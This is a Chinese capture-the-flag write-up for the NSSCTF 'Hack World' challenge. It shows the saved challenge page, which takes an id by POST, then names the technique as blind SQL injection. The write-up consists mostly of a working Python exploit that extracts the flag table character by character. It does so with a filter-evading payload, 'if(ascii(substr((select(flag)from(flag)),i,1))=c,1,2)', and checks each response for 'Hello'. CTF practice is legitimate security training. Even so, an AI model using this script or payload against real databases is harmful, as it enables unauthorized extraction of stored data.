题目
<!-- saved from url=(0043)http://node4.anna.nssctf.cn:28181/index.php -->
<html><script id="allow-copy_script">(function agent() {
let unlock = false
document.addEventListener('allow_copy', (event) => {
unlock = event.detail.unlock
})
const copyEvents = [
'copy',
'cut',
'contextmenu',
'selectstart',
'mousedown',
'mouseup',
'mousemove',
'keydown',
'keypress',
'keyup',
]
const rejectOtherHandlers = (e) => {
if (unlock) {
e.stopPropagation()
if (e.stopImmediatePropagation) e.stopImmediatePropagation()
}
}
copyEvents.forEach((evt) => {
document.documentElement.addEventListener(evt, rejectOtherHandlers, {
capture: true,
})
})
})()</script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hack World</title>
</head>
<body>
<h3>All You Want Is In Table 'flag' and the column is 'flag'</h3>
<h3>Now, just give the id of passage</h3>
<form action="http://node4.anna.nssctf.cn:28181/index.php" method="POST">
<input type="text" name="id">
<input type="submit">
</form>
</body></html>
思路
这是一道POST形式的SQL盲注
EXP
import string
import requests
import time # 导入时间模块用于添加等待时间
res = ""
url = "http://node4.anna.nssctf.cn:28181/index.php"
for i in range(1, 60): # 遍历每个字符的位置
found = False # 标志位,用于判断是否找到当前字符
for j in string.printable: # 遍历所有可打印字符
sql = 'if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(i, ord(j))
post = {"id": sql}
print(f"Trying position {i} with character '{j}'...") # 显示当前尝试的字符和位置
result = requests.post(url=url, data=post)
if 'Hello' in result.text:
res += j # 找到正确字符,加入结果
print(f"Found character at position {i}: '{j}'") # 显示找到的字符
print(f"Current flag: {res}") # 显示当前解密的部分
found = True
break # 跳出内层循环,继续下一个位置
else:
continue
if not found: # 如果当前位置没有找到任何匹配字符,跳出外层循环
print(f"No character found at position {i}. Stopping...")
break
time.sleep(1)
print("Final flag:", res) # 输出最终结果